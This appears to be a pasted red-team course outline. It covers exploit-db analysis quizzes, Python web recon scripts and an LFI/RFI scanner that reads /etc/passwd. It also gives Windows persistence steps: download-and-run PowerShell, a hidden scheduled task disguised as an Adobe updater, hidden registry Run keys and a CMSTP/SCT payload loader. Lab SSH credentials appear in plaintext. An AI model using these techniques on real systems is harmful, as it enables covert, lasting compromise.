joemccray

Red Team 2021

Aug 31st, 2020 (edited)
972
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ----------------------Day 1------------------------------
  2.  
  3. Exploit Analysis
  4.  
  5. #######################################################
  6. # Open the following web links below as tabs #
  7. # For each web link answer all of the questions below #
  8. #######################################################
  9. https://www.exploit-db.com/exploits/46762
  10. https://www.exploit-db.com/exploits/46070
  11. https://www.exploit-db.com/exploits/40713
  12. https://www.exploit-db.com/exploits/46458
  13. https://www.exploit-db.com/exploits/40712
  14. https://www.exploit-db.com/exploits/40714
  15. https://www.exploit-db.com/exploits/40680
  16. https://www.exploit-db.com/exploits/40673
  17. https://www.exploit-db.com/exploits/40681
  18. https://www.exploit-db.com/exploits/37731
  19. https://www.exploit-db.com/exploits/31254
  20. https://www.exploit-db.com/exploits/31255
  21. https://www.exploit-db.com/exploits/27703
  22. https://www.exploit-db.com/exploits/27277
  23. https://www.exploit-db.com/exploits/26495
  24. https://www.exploit-db.com/exploits/24557
  25. https://www.exploit-db.com/exploits/39417
  26. https://www.exploit-db.com/exploits/23243
  27.  
  28.  
  29.  
  30. ###############################
  31. ###################### # Class Exploit Dev Quiz Task # ######################
  32. ###############################
  33.  
  34.  
  35. EID number:
  36.  
  37. 1. Vulnerable Software Info
  38. a- Target Product Name
  39. b- Target Software version
  40. c- Available for download on exploit-db.com
  41.  
  42.  
  43. 2. Target platform
  44. a- OS Name (ex: Windows XP)
  45. b- Service pack (ex: SP3)
  46. c- Language pack (ex: English)
  47.  
  48.  
  49. 3. Exploit info
  50. a- modules imported (ex: sys, re, os)
  51. b- application entry point (ex: TRUN)
  52. c- distance to EIP (ex: 2006)
  53. d- how is code redirection done (ex: JMP ESP, JMP ESI)
  54. e- number of NOPs (ex: 10 * \x90 = 10 NOPs)
  55. f- length of shellcode (ex: 368)
  56. g- bad characters (ex: \x0a\x00\x0d)
  57. h- is the target ip hard-coded
  58. i- what does the shellcode do (ex: bind shell, reverse shell, calc)
  59. j- what is the total buffer length
  60. k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
  61. l- Is this a server side or client-side exploit
  62.  
  63.  
  64.  
  65.  
  66. ######################################
  67. # Exploit Development Scoring System #
  68. ######################################
  69.  
  70. 1. Comments
  71. -----------
  72. 1a. Has detailed comments (1 point)
  73. 1b. Comments target app info (1 point)
  74. 1c. Comments target platform info (1 point)
  75. 1d. Comments protocol or file spec info (1 point)
  76. 1e. Comments program redirection info (1 point)
  77. 1f. Comments shellcode info (1 point)
  78.  
  79.  
  80. 2. Modules/Libraries
  81. --------------------
  82. 2a. Uses correct modules/libraries to properly interact with protocol or file type (1 point)
  83.  
  84.  
  85. 3. Program redirection
  86. ----------------------
  87. 3a. Use correct program redirection (JMP ESP, CALL ESP, PUSH ESP; RET) from the correct platform for stable program code redirection
  88.  
  89. 4. Shellcode
  90. ------------
  91. 4a. Tests for bad characters (1 point)
  92. 4b. Tests for maximum length of payload (1 point)
  93.  
  94. 5. Exploit stability
  95. --------------------
  96. 5a. Use NOPS correctly
  97. 5b. Maps to protocol or file spec correctly
  98. 5c. Uses a stack shift if applicable
  99. 5c. Uses correct EXITFUNC for stability (1 point)
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107. ----------------------Day 2------------------------------
  108.  
  109. - I prefer to use Putty to SSH into my Linux host.
  110. - You can download Putty from here:
  111. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  112.  
  113. Log in to this server to perform these labs:
  114.  
  115. Server: 149.28.201.171
  116. Protocol: ssh
  117. Port: 22
  118. user: redteam
  119. pass: redteam!@
  120.  
  121. If you are on a Mac (https://osxdaily.com/2017/04/28/howto-ssh-client-mac/)
  122.  
  123. Open a terminal, then type:
  124. -------------------------------
  125. ssh -l redteam 149.28.201.171
  126. -------------------------------
  127.  
  128. ---------------------------Type This-----------------------------------
  129. cd ~/students/
  130. mkdir yourname
  131. cd yourname
  132. -----------------------------------------------------------------------
  133.  
  134.  
  135.  
  136. ################################
  137. # Web App Testing with Python3 #
  138. ################################
  139.  
  140.  
  141.  
  142.  
  143. ##############################
  144. # Bannergrabbing a webserver #
  145. ##############################
  146.  
  147. ---------------------------Type This-----------------------------------
  148. nano bannergrab.py
  149.  
  150.  
  151. ---------------------------Paste This----------------------------------
  152.  
  153. #!/usr/bin/env python3
  154. import sys
  155. import socket
  156.  
  157. # Great reference: https://www.mkyong.com/python/python-3-typeerror-cant-convert-bytes-object-to-str-implicitly/
  158.  
  159. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  160. s.connect(("45.63.104.73", 80))
  161. s.send(("GET / HTTP/1.1\r\n\r\n").encode())
  162.  
  163. #Convert response to bytes
  164. response = b""
  165. # or use encode()
  166. #response = "".encode()
  167.  
  168. while True:
  169. data = s.recv(4096)
  170. response += data
  171. if not data:
  172. break
  173. s.close()
  174. print(response.decode())
  175. ----------------------------------------------------------------------
  176.  
  177.  
  178. ---------------------------Type This-----------------------------------
  179. python3 bannergrab.py
  180. -----------------------------------------------------------------------
  181.  
  182.  
  183.  
  184. ########################################
  185. # Testing availability of HTTP methods #
  186. ########################################
  187.  
  188. A very good practice for a penetration tester is to start by listing the various available HTTP methods.
  189. Following is a Python script with the help of which we can connect to the target web server and enumerate the available HTTP methods:
  190.  
  191. To begin with, we need to import the requests library:
  192.  
  193. ---------------------------
  194. python3
  195. import requests
  196. ---------------------------
  197.  
  198. After importing the requests library,create an array of HTTP methods, which we are going to send. We will make use ofsome standard methods like 'GET', 'POST', 'PUT', 'DELETE', 'OPTIONS' and a non-standard method ‘TEST’ to check how a web server can handle the unexpected input.
  199.  
  200. ----------------------------------------------------------------------------
  201. method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
  202. ----------------------------------------------------------------------------
  203.  
  204. The following line of code is the main loop of the script, which will send the HTTP packets to the web server and print the method and the status code.
  205.  
  206. ------------------------------------------------------
  207. for method in method_list:
  208. req = requests.request(method, 'https://www.google.com')
  209. print (method, req.status_code, req.reason)
  210. ------------------------------------------------------
  211.  
  212.  
  213. ------------------------------------------------------
  214. for method in method_list:
  215. req = requests.request(method, 'https://www.darkoperator.com')
  216. print (method, req.status_code, req.reason)
  217. ------------------------------------------------------
  218.  
  219.  
  220. ------------------------------------------------------
  221. for method in method_list:
  222. req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
  223. print (method, req.status_code, req.reason)
  224. ------------------------------------------------------
  225.  
  226.  
  227. ------------------------------------------------------
  228. for method in method_list:
  229. req = requests.request(method, 'http://www.dybedu.com')
  230. print (method, req.status_code, req.reason)
  231. ------------------------------------------------------
  232.  
  233.  
  234. The next line will test for the possibility of cross site tracing (XST) by sending the TRACE method.
  235.  
  236. -------------------------------------------------------------
  237. if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
  238. print ('Cross Site Tracing(XST) is possible')
  239. -------------------------------------------------------------
  240.  
  241.  
  242. -------------------------------
  243. exit()
  244. -------------------------------
  245.  
  246.  
  247.  
  248. *** Full code with example url: ***
  249.  
  250. ---------------------------Type This-----------------------------------
  251. nano xst.py
  252.  
  253.  
  254. ---------------------------Paste This----------------------------------
  255. #!/usr/bin/env python3
  256. import requests
  257. method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
  258. for method in method_list:
  259. req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
  260. print (method, req.status_code, req.reason)
  261. if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
  262. print ('Cross Site Tracing(XST) is possible')
  263.  
  264. -------------------------------------------------------------------------
  265.  
  266.  
  267. After running the above script for a particular web server, we will get 200 OK responses for a particular method accepted by the web server. We will get a 403 Forbidden response if the web server explicitly denies the method. Once we send the TRACE method for testing cross site tracing (XST), we will get 405 Not Allowed responses from the web server otherwise we will get the message ‘Cross Site Tracing(XST) is possible’.
  268.  
  269.  
  270. ---------------------------Type This-----------------------------------
  271. python3 xst.py
  272. -----------------------------------------------------------------------
  273.  
  274.  
  275.  
  276. ##########################################
  277. # Foot printing by checking HTTP headers #
  278. ##########################################
  279.  
  280.  
  281. HTTP headers are found in both requests and responses from the web server. They also carry very important information about servers. That is why penetration tester is always interested in parsing information through HTTP headers. Following is a Python script for getting the information about headers of the web server:
  282.  
  283. To begin with, let us import the requests library:
  284.  
  285. ------------------------
  286. import requests
  287. ------------------------
  288.  
  289. We need to send a GET request to the web server. The following line of code makes a simple GET request through the requests library.
  290.  
  291. ---------------------------------------------
  292. request = requests.get('enter the URL')
  293. ---------------------------------------------
  294.  
  295. Next, we will generate a list of headers about which you need the information.
  296.  
  297. ---------------------------------------------------------------------------------------------------------------
  298. header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
  299. ---------------------------------------------------------------------------------------------------------------
  300.  
  301. Next is a try and except block.
  302.  
  303. ---------------------------------------------------
  304. for header in header_list:
  305.  
  306. try:
  307. result = request.headers[header]
  308. print ('%s: %s' % (header, result))
  309. except Exception as err:
  310. print ('%s: No Details Found' % header)
  311.  
  312. ---------------------------------------------------
  313.  
  314.  
  315.  
  316.  
  317. *** Example Full Code: ***
  318.  
  319. ---------------------------Type This-----------------------------------
  320. nano headercheck.py
  321.  
  322.  
  323. ---------------------------Paste This----------------------------------
  324. #!/usr/bin/env python3
  325. import requests
  326. request = requests.get('https://dvws1.infosecaddicts.com/dvws1/appinfo.php')
  327. header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
  328. for header in header_list:
  329. try:
  330. result = request.headers[header]
  331. print ('%s: %s' % (header, result))
  332. except Exception as err:
  333. print ('%s: No Details Found' % header)
  334. ----------------------------------------------------------------------------------------------------------------
  335.  
  336.  
  337. After running the above script for a particular web server, we will get the information about the headers provided in the header list. If there will be no information for a particular header then it will give the message ‘No Details Found’.
  338.  
  339.  
  340. ---------------------------Type This-----------------------------------
  341. python3 headercheck.py
  342. -----------------------------------------------------------------------
  343.  
  344.  
  345. ##############################################
  346. # Testing insecure web server configurations #
  347. ##############################################
  348.  
  349. We can use HTTP header information to test insecure web server configurations. In the following Python script, we are going to use try/except block to test insecure web server headers for number of URLs that are saved in a text file name websites.txt.
  350. ---------------------------Type This-----------------------------------
  351. nano websites.txt
  352.  
  353. ---------------------------Paste This----------------------------------
  354. https://www.google.com
  355. https://www.cnn.com
  356. https://foxnews.com
  357. https://phpapp.infosecaddicts.com/
  358. https://aspdotnetapp.infosecaddicts.com/
  359. https://dvws1.infosecaddicts.com/
  360. -----------------------------------------------------------------------
  361.  
  362.  
  363.  
  364.  
  365. ---------------------------Type This-----------------------------------
  366. nano insecure_config_check.py
  367.  
  368.  
  369. ---------------------------Paste This----------------------------------
  370. #!/usr/bin/env python3
  371.  
  372. # Reference: https://www.keycdn.com/blog/http-security-headers
  373.  
  374. import requests
  375. urls = open("websites.txt", "r")
  376. for url in urls:
  377. url = url.strip()
  378. req = requests.get(url)
  379. print (url, 'report:')
  380. try:
  381. protection_xss = req.headers['X-XSS-Protection']
  382. if protection_xss != '1; mode=block':
  383. print ('X-XSS-Protection not set properly, it may be possible:', protection_xss)
  384. except:
  385. print ('X-XSS-Protection not set, it may be possible')
  386. try:
  387. options_content_type = req.headers['X-Content-Type-Options']
  388. if options_content_type != 'nosniff':
  389. print ('X-Content-Type-Options not set properly:', options_content_type)
  390. except:
  391. print ('X-Content-Type-Options not set')
  392. try:
  393. transport_security = req.headers['Strict-Transport-Security']
  394. except:
  395. print ('HSTS header not set properly, Man in the middle attacks is possible')
  396. try:
  397. content_security = req.headers['Content-Security-Policy']
  398. print ('Content-Security-Policy set:', content_security)
  399. except:
  400. print ('Content-Security-Policy missing')
  401.  
  402. -----------------------------------------------------------------------
  403.  
  404.  
  405. ---------------------------Type This-----------------------------------
  406. python3 insecure_config_check.py
  407. -----------------------------------------------------------------------
  408.  
  409.  
  410.  
  411.  
  412.  
  413.  
  414.  
  415.  
  416. ---------------------------Type This-----------------------------------
  417. nano LFI-RFI.py
  418.  
  419.  
  420. ---------------------------Paste This----------------------------------
  421.  
  422. #!/usr/bin/env python3
  423. print("\n### PHP LFI/RFI Detector ###")
  424.  
  425. import urllib.request, urllib.error, urllib.parse,re,sys
  426.  
  427. TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
  428. RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
  429. TravLimit = 12
  430.  
  431. print("==> Testing for LFI vulns..")
  432. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
  433. for x in range(1,TravLimit): ## ITERATE THROUGH THE LOOP
  434. TARGET += "../"
  435. try:
  436. source = urllib.request.urlopen((TARGET+"etc/passwd")).read().decode() ## WEB REQUEST
  437. except urllib.error.URLError as e:
  438. print("$$$ We had an Error:",e)
  439. sys.exit(0)
  440. if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  441. print("!! ==> LFI Found:",TARGET+"etc/passwd")
  442. break ## BREAK LOOP WHEN VULN FOUND
  443.  
  444. print("\n==> Testing for RFI vulns..")
  445. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
  446. try:
  447. source = urllib.request.urlopen(TARGET).read().decode() ## WEB REQUEST
  448. except urllib.error.URLError as e:
  449. print("$$$ We had an Error:",e)
  450. sys.exit(0)
  451. if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
  452. print("!! => RFI Found:",TARGET)
  453.  
  454. print("\nScan Complete\n") ## DONE
  455. ----------------------------------------------------------------------
  456.  
  457.  
  458.  
  459.  
  460. ---------------------------Type This-----------------------------------
  461. python3 LFI-RFI.py
  462. -----------------------------------------------------------------------
  463.  
  464.  
  465.  
  466. Come up with an analysis framework like yesterday in order to analyze these exploits:
  467. https://www.exploit-db.com/exploits/46487
  468. https://www.exploit-db.com/exploits/48711
  469. https://www.exploit-db.com/exploits/48722
  470. https://www.exploit-db.com/exploits/41976
  471. https://www.exploit-db.com/exploits/46479
  472.  
  473.  
  474.  
  475. ----------------------Day 3------------------------------
  476. ###############
  477. # Persistance #
  478. ###############
  479.  
  480.  
  481. ---- Scheduled Task Based Persistance ----
  482. 1. Scheduled task based on most commonly occuring event ID
  483. https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1
  484.  
  485.  
  486.  
  487. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  488.  
  489. ---------------------------Type This-----------------------------------
  490. mkdir c:\persistance
  491.  
  492. cd c:\persistence
  493.  
  494. (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/TestingPens/MalwarePersistenceScripts/master/user_event_persistence.ps1", "c:\persistence\user_event_persistence.ps1")
  495.  
  496. .\user_event_persistence.ps1
  497. -------------------------------------------------------------------------
  498.  
  499.  
  500.  
  501. - Alternative method:
  502. --------------------
  503. In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"
  504.  
  505. - Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on target machine:
  506. - adapt <UserId></UserId> to SID of current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
  507. - adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
  508. - this scheduled task triggers on a event, can be changed to regular calls (e.g. once an hour)
  509.  
  510. --------------------------------
  511. <?xml version="1.0" encoding="UTF-16"?>
  512. <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  513. <RegistrationInfo>
  514. <Author>Adobe Systems Incorporated</Author>
  515. <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  516. </RegistrationInfo>
  517. <Triggers>
  518. <EventTrigger>
  519. <Enabled>true</Enabled>
  520. <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  521. </EventTrigger>
  522. </Triggers>
  523. <Principals>
  524. <Principal id="Author">
  525. <UserId>S-1-5-18</UserId>
  526. <RunLevel>LeastPrivilege</RunLevel>
  527. </Principal>
  528. </Principals>
  529. <Settings>
  530. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  531. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  532. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
  533. <AllowHardTerminate>true</AllowHardTerminate>
  534. <StartWhenAvailable>true</StartWhenAvailable>
  535. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
  536. <IdleSettings>
  537. <StopOnIdleEnd>true</StopOnIdleEnd>
  538. <RestartOnIdle>false</RestartOnIdle>
  539. </IdleSettings>
  540. <AllowStartOnDemand>true</AllowStartOnDemand>
  541. <Enabled>true</Enabled>
  542. <Hidden>true</Hidden>
  543. <RunOnlyIfIdle>false</RunOnlyIfIdle>
  544. <WakeToRun>false</WakeToRun>
  545. <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
  546. <Priority>7</Priority>
  547. </Settings>
  548. <Actions Context="Author">
  549. <Exec>
  550. <Command>C:\Windows\System32\calc.exe</Command>
  551. </Exec>
  552. </Actions>
  553. </Task>
  554.  
  555. ---------------------------
  556.  
  557. Now let's create the scheduled task
  558. ---------------------------Type This-----------------------------------
  559. schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
  560. -----------------------------------------------------------------------
  561.  
  562.  
  563. Sit back and wait for the task to trigger. By the way we got the correct XML file format by creating a scheduled tasked and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.
  564.  
  565.  
  566.  
  567.  
  568. ---- Registry Based Persistance ---
  569. 1. RunOnce key persistance trick
  570. Reference:
  571. https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
  572.  
  573.  
  574.  
  575. 1. upload your executable to system
  576. 2. add registry entry (requires admin privileges):
  577. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"
  578.  
  579. Note:
  580. Beacon/Shell may prevent the user to login as he is hanging in the Beacon executable. Solution: spawn new beacon and exit initial beacon.
  581.  
  582.  
  583.  
  584.  
  585.  
  586. 2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
  587. Let's try this:
  588. https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
  589.  
  590.  
  591. 2. Hide Reg
  592. Let's try this code out:
  593. https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741
  594.  
  595. Reference:
  596. https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
  597.  
  598.  
  599.  
  600.  
  601. Get the following two files
  602. ---------------------------
  603. https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
  604. https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1
  605.  
  606. In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible for regedit and powershell.
  607.  
  608. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  609.  
  610. ---------------------------Type This-----------------------------------
  611. mkdir c:\persistance
  612.  
  613. cd c:\persistance
  614.  
  615. (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistance\PSReflect.ps1")
  616.  
  617. (new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistance\PSReflect-RegHide.ps1")
  618.  
  619. .\PSReflect-RegHide.ps1
  620. -------------------------------------------------------------------------
  621.  
  622.  
  623.  
  624. Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
  625. ---------------------------Type This-----------------------------------
  626. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  627. Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  628. -----------------------------------------------------------------------
  629. However, it will be visible e.g. for Sysinternals Autorun tool
  630.  
  631.  
  632.  
  633. 3. VShadow
  634. Let's try this out:
  635. https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
  636.  
  637.  
  638.  
  639. 1. Download vshadow.exe including in the WinSDK
  640. Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
  641. Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
  642. 2. Upload the vshadow.exe to the target machine
  643. 3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")
  644.  
  645.  
  646. ---------------------------Type This-----------------------------------
  647. mkdir c:\persistance
  648.  
  649. cd c:\persistance
  650.  
  651. (new-object System.Net.WebClient).DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe", "c:\persistance\vshadow.exe")
  652.  
  653. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
  654. -----------------------------------------------------------------------
  655.  
  656.  
  657. 4. INF-SCT
  658. Let's try this out:
  659. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  660. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  661.  
  662.  
  663. Technique 1: CMSTP
  664. ------------------
  665. create "c:\persistance\cmstp.inf" with the following content:
  666. -----------------------------------
  667. ;cmstp.exe cmstp.inf
  668.  
  669. [version]
  670. Signature=$chicago$
  671. AdvancedINF=2.5
  672.  
  673. [DefaultInstall_SingleUser]
  674. UnRegisterOCXs=UnRegisterOCXSection
  675.  
  676. [UnRegisterOCXSection]
  677. %11%\scrobj.dll,NI,c:\persistance\test.sct
  678.  
  679. [Strings]
  680. AppAct = "SOFTWARE\Microsoft\Connection Manager"
  681. ServiceName="Yay"
  682. ShortSvcName="Yay"
  683. ----------------------------------------------------
  684.  
  685.  
  686.  
  687. get a sample sct payload (e.g. https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019) and store it in "c:\persistance\test.sct"
  688.  
  689.  
  690. ---------------------------Type This-----------------------------------
  691. mkdir c:\persistance
  692.  
  693. cd c:\persistance
  694.  
  695. (new-object System.Net.WebClient).DownloadFile("https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019", "c:\persistance\test.sct")
  696.  
  697. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d "\"C:\Windows\System32\cmstp.exe\" /s C:\persistance\cmstp.inf"
  698. -----------------------------------------------------------------------
  699.  
  700.  
  701. reboot your machine
  702. your sct payload will be executed upon reboot. HOWEVER, as a Windows binary executes it, Sysinternals Autorun tool will not show it, unless you untick "Options->Hide Windows Entries" option
  703.  
  704.  
  705.  
  706. 5. GPScript.exe
  707. Let's try this out:
  708. https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  709.  
  710.  
  711.  
  712. ---- Cobalt Strike Agressor Persistance Scripts ----
  713. https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
  714. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
  715. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna
  716.  
  717. References:
  718. https://docs.broadcom.com/doc/istr-living-off-the-land-and-fileless-attack-techniques-en
  719.  
  720.  
  721.  
  722.  
  723.  
  724.  
  725. Day 4
  726. --------
  727.  
  728. https://drive.google.com/file/d/16Ju5DHfsQAz2N-peWwElU8hb8BnR6cPv/view?usp=sharing
  729. https://drive.google.com/file/d/1-5JbaoRJzs9He2gFNb9RJDuaQwnLhngw/view?usp=sharing
  730.  
  731.  
  732.  
  733.  
  734.  
  735. Intro to Shellcode
  736.  
  737. Step 1: Download and install CodeBlocks
  738. https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03mingw-setup.exe/download
  739.  
  740. If you are new to the CodeBlocks tool like I was here is the manual:
  741. http://codeblocks.org/docs/manual_codeblocks_en.pdf
  742.  
  743.  
  744. Step 2: Create a folder on your desktop called ShellCoding
  745.  
  746.  
  747. Step 3: Save arwin.c and ListDLLs into this new ShellCoding folder on your Desktop
  748. Goto both http://www.vividmachines.com/shellcode/arwin.c, http://www.ollydbg.de/odbg201.zip, and https://download.sysinternals.com/files/ListDlls.zip
  749. to download these files into this new ShellCoding folder on your Desktop
  750.  
  751.  
  752. Step 4: Complile arwin.c
  753. Open arwin.c in the CodeBlocks application, and choose the option to "Build".
  754. Open a command prompt and browse to the ShellCoding folder. Type 'dir' to ensure that arwin.exe is in directory.
  755. If it's not there, then there was an issue with your build. Ask me to help you troubleshoot this.
  756.  
  757.  
  758. Step 5: Linux vs Windows code execution basics
  759. Linux, unlike windows, provides a direct way to interface with the kernel through the int 0x80 interface. A complete listing of the Linux syscall table can be found here (https://filippo.io/linux-syscall-table/). Windows on the other hand, does not have a direct kernel interface. The system must be interfaced by loading the address of the function that needs to be executed from a DLL (Dynamic Link Library).
  760.  
  761. The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant. Windows programmers did this so that they could make any change needed to the kernel without any hassle; Linux on the contrary has fixed numbering system for all kernel level functions, and if they were to change, there would be a million angry programmers (and a lot of broken code).
  762.  
  763. Step 6: Look at DLLs utilized by exe files
  764. calc
  765.  
  766. Listdlls64.exe calc
  767.  
  768. notepad
  769.  
  770. Listdlls64.exe notepad
  771.  
  772.  
  773.  
  774.  
  775. Step 7: Look at the addresses of the functions utilized by each DLL file
  776.  
  777. arwin.exe user32.dll MessageBoxA
  778.  
  779. arwin.exe kernel32.dll LoadLibraryA
  780.  
  781. arwin.exe kernel32.dll Sleep
  782.  
  783. arwin.exe kernel32.dll GetProcAddress
  784.  
  785. arwin.exe kernel32.dll ExitProcess
  786.  
  787. Step 8: Get a message box to pop up
  788. https://resources.infosecinstitute.com/injecting-spyware-exe-code-injections/#gref
  789.  
  790. Step 9: Do chapters 1-3 in this Shellcoding tutorial
  791. https://www.exploit-db.com/docs/english/17065-manual-shellcode.pdf
Add Comment
Please, Sign In to add comment